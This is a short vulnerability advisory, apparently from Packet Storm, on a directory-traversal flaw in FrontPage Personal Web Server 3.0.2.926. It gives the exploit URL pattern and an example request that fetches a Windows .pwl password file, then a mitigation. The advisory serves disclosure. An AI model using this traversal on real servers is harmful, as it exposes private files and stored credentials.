Frontpage-PWS32/3.0.2.926 (probably others) allows reading of any file on the system by putting /.../ into the url.
137d1427da44a3a1678c34f2c5e6d18c442d4b292586eb2186b4a6d260aca401Description: Doubledot bug in FrontPage FrontPage Personal Web Server.
Compromise: Accessing drive trough browser.
Vulnerable Systems: Frontpage-PWS32/3.0.2.926 other versions not tested.
Details:
When FrontPage-PWS runs a site on your c:\ drive your drive could be =
accessed by any user accessing your page, simply by requesting any file =
in any directory except the files in the FrontPage dir. specially =
/_vti_pvt/.
How to exploit this bug?
Simply adding /..../ in the URL addressbar.
http://www.target.com/..../<any_dir>/<any_file>
so by requesting http://www.target.com/..../Windows/Admin.pwl the =
webserver let us download the .pwl file from the target.
Files and dirs. with the hidden attribute set are vulnerable.
Solution:
The best solution is installing FrontPage on a drive that doesn't =
contain Private information.
Greetings,
Jan van de Rijt aka The Warlock.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed